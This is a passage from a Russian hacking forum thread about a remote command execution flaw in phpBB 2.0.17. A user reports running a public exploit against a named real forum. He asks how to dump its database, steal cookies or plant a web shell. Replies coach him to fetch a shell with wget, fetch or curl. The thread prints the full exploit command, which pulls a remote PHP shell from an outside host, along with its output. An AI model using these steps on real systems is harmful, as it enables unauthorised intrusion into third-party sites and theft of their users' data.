Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   phpBB <= 2.0.17 (https://forum.antichat.xyz/showthread.php?t=19246)

Dimazzz 17.05.2006 16:15
phpBB <= 2.0.17
 
phpBB <= 2.0.17
Цель: выполнение произвольных команд на сервере(php-inj)
Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>"


Я использовал эту уязвимость на форуме http://www.abbadon.ru/f/ вроде все получилось.
У меня вопрос можно ли какой нить командой узнать хеш пользователя, или слить базу, и возможно еще залить shell? объясните плиз.

ShAnKaR 17.05.2006 17:37
так этож уязвимость представляет собой php injection
так что базу слить канечно можно в любом случае, вот шел записать только если прав хватит, логично?
не в тему но всеже скажу
хреновый канечно у нас FAQ по phpbb чисто реклама рст, ни какой информативности :( мля
кстати еще от себя скажу что странно вроде там php 5.1 а GLOBALS через GET всеравно работает.

Dimazzz 17.05.2006 17:47
какой командой можно базу слить?
или шел залить

может я просто не так делаю :) не ругайтесь ;)


C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ тут_команда

или это делается пл другому?

EST a1ien 17.05.2006 17:51
А команда простая wget http://путь_к шелу.
И он зальётся.

Dimazzz 17.05.2006 18:03
C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници :(
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

ShAnKaR 17.05.2006 18:07
попробуй без сплоита делать тогда быстрее во всем разберешся

Dimazzz 17.05.2006 18:09
Цитата:
Сообщение от ShAnKaR
попробуй без сплоита делать тогда быстрее во всем разберешся
какким образом ? объясни пожалуйста. Мне просто у этого форума куки нужно выдрать или базу. Вобщем получить достут можно даже без админки.

nytros 17.05.2006 18:16
Цитата:
Сообщение от Dimazzz
C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ wget http://probnii.newmail
.ru/remview.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/GHC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
Done. User 234558372 successfully registered!

и дальше вылетает непонятный большой код как будто главной страници :(
может что я сто то неправильно делаю

захожу в командную строку.
иду к папке с перлом и от туда запускаю сплоит.
и дальше C:\Perl\bin>r57phpbb2017.pl http://www.abbadon.ru/f/ команда

чет неполучается ;( сайт http://www.abbadon.ru/f/

А может там wget нету а чтото другое и шел не залился.Попробуй вместо wget fetch ili curl вставить.

ShAnKaR 17.05.2006 18:27
вот здесь
http://www.hardened-php.net/advisory_172005.75.html
первое описание баги челом который её нашел, к томуже подскажу что вся фишка в файле
includes/usercp_register.php

Dimazzz 17.05.2006 18:27
эффект тот же ни чего не происходит как будто что то не так делаю


Время: 00:28
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице